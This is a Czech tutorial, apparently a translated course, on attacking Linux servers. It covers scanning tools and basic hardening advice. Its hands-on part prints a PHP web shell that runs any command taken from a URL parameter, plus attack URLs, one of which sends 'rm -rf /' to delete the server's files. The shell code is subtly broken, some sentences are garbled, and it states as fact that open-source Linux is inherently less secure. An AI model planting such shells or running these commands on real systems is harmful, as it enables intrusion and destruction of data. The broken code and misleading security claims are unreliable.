Linux je nejrozšířenější serverový operační systém, zejména pro webové servery. Je open source; to znamená, že kdokoli může mít přístup ke zdrojovému kódu. Proto je ve srovnání s jinými operačními systémy méně bezpečný, protože útočníci mohou studovat zdrojový kód a hledat v něm zranitelnosti. Linux pro hackery se zabývá využitím těchto zranitelností k získání neoprávněného přístupu do systému.
V tomto článku vás seznámíme s tím, co je Linux, s jeho bezpečnostními zranitelnostmi, s hackováním Ubuntu a s protiopatřeními, která můžete zavést.
- Témata probíraná v tomto kurzu
- Stručná poznámka o Linuxu
- Nástroje pro hackování Linuxu
- Jak zabránit hackování Linuxu
- Hackerská činnost: V tomto praktickém scénáři se naučíme, jak hacknout systém Ubuntu, a poskytneme vám základní informace o tom, jak můžete pomocí jazyka PHP napadnout systém Linux
- Shrnutí
Témata probíraná v tomto kurzu
- Stručná poznámka k Linuxu
- Nástroje pro hackování Linuxu
- Jak zabránit hackování Linuxu
- Hackerská činnost:
Stručná poznámka o Linuxu
Linux je operační systém s otevřeným zdrojovým kódem. Existuje mnoho distribucí operačních systémů založených na Linuxu, například Redhat, Fedora a Ubuntu atd. Na rozdíl od jiných operačních systémů je Linux méně bezpečný, pokud jde o zabezpečení. Je to proto, že jeho zdrojový kód je volně dostupný, takže je snadné studovat jeho zranitelnosti a zneužívat je ve srovnání s jinými operačními systémy, které nejsou open source. Linux lze používat jako operační systém pro servery, stolní počítače, tablety nebo mobilní zařízení.
Programy v Linuxu lze ovládat pomocí grafického uživatelského rozhraní nebo příkazů. Příkazy pro hackování systému Kali Linux jsou ve srovnání s použitím grafického uživatelského rozhraní efektivnější a účinnější. Z tohoto důvodu je užitečné znát základní linuxové příkazy pro hackování.
Podívejte se na tyto návody https://www.guru99.com/unix-linux-tutorial.html, jak začít s hackováním Kali Linuxu.
Nástroje pro hackování Linuxu
- Nessus – tento nástroj lze použít pro hackování Ubuntu, skenování nastavení konfigurace, záplat a sítí atd. najdete ho na adrese https://www.tenable.com/products/nessus
- NMap. Tento nástroj lze použít ke sledování hostitelů běžících na serveru a služeb, které využívají. Lze jej také použít ke skenování portů. Najdete jej na adrese https://nmap.org/
- SARA – SARA je zkratka pro Security Auditor’s Research Assistant (Asistent pro výzkum bezpečnostního auditora). Jak název napovídá, tento nástroj lze použít k auditu sítí proti hrozbám, jako je SQL Injection, XSS atd. naleznete jej na adrese http://www-arc.com/sara/sara.html
Výše uvedený seznam není vyčerpávající; poskytuje vám představu o dostupných nástrojích pro hackování Ubuntu a systémů Linux.
Jak zabránit hackování Linuxu
Hackování Linuxu využívá zranitelnosti operačního systému. Organizace může přijmout následující zásady ochrany před takovými útoky.
- Správa záplat – záplaty opravují chyby, které útočníci využívají ke kompromitaci systému. Dobrá politika správy záplat zajistí, že budete do systému neustále aplikovat příslušné záplaty.
- Správná konfigurace operačního systému- další exploity využívají slabin v konfiguraci serveru. Neaktivní uživatelská jména a démoni by měli být zakázáni. Výchozí nastavení, jako jsou běžná hesla k aplikacím, výchozí uživatelská jména a některá čísla portů, by měla být změněna.
- Systém detekce narušení- takové nástroje lze použít k odhalení neoprávněného přístupu do systému. Některé nástroje mají schopnost takové útoky odhalit a zabránit jim.
Hackerská činnost: V tomto praktickém scénáři se naučíme, jak hacknout systém Ubuntu, a poskytneme vám základní informace o tom, jak můžete pomocí jazyka PHP napadnout systém Linux
. Nebudeme se zaměřovat na žádnou oběť. Pokud si to chcete vyzkoušet, můžete si na svůj lokální počítač nainstalovat LAMPP.
PHP obsahuje dvě funkce, které lze použít k provádění příkazů pro hackování Linuxu. Má funkce exec() a shell_exec(). Funkce exec() vrací poslední řádek výstupu příkazu, zatímco funkce shell_exec() vrací celý výsledek příkazu jako řetězec.
Pro demonstrační účely předpokládejme, že útočníkovi manažeři nahrají na webový server následující soubor.
<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>
ZDE,
Výše uvedený skript získá příkaz z proměnné GET s názvem cmd. Příkaz se provede pomocí funkce shell_exec() a výsledek se vrátí do prohlížeče.
Výše uvedený kód lze zneužít pomocí následující adresy URL
http://localhost/cp/konsole.php?cmd=ls%20-l
ZDE,
- „…konsole.php?cmd=ls%20-l „přiřadí proměnné cmd hodnotu ls -l.
Příkaz v Ubuntu pro hackování proti serveru se provede jako
shell_exec('ls -l') ;
Spuštění výše uvedeného kódu na webovém serveru dává podobné výsledky jako následující.
Výše uvedený příkaz jednoduše zobrazí soubory v aktuálním adresáři a práva
Předpokládejme, že útočník zadá následující příkaz
rm -rf /
ZDE,
- „rm“ odstraní soubory
- „rf“ způsobí, že se příkaz rm spustí v rekurzivním režimu. Odstranění všech složek a souborů
- „/“ dává příkazu pokyn, aby začal odstraňovat soubory z kořenového adresáře
Adresa URL útoku by vypadala nějak takto
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Shrnutí
- Linux je oblíbený operační systém pro servery, stolní počítače, tablety a mobilní zařízení.
- Linux je otevřený zdrojový kód a zdrojový kód může získat kdokoli. Díky tomu je snadné odhalit zranitelnosti. Je to jeden z nejlepších operačních systémů pro hackery.
- Základní a síťové hackerské příkazy v Ubuntu jsou pro linuxové hackery cenné.
- Zranitelnosti jsou slabiny, které lze využít ke kompromitaci systému.
- Dobré zabezpečení může pomoci ochránit systém před napadením útočníkem.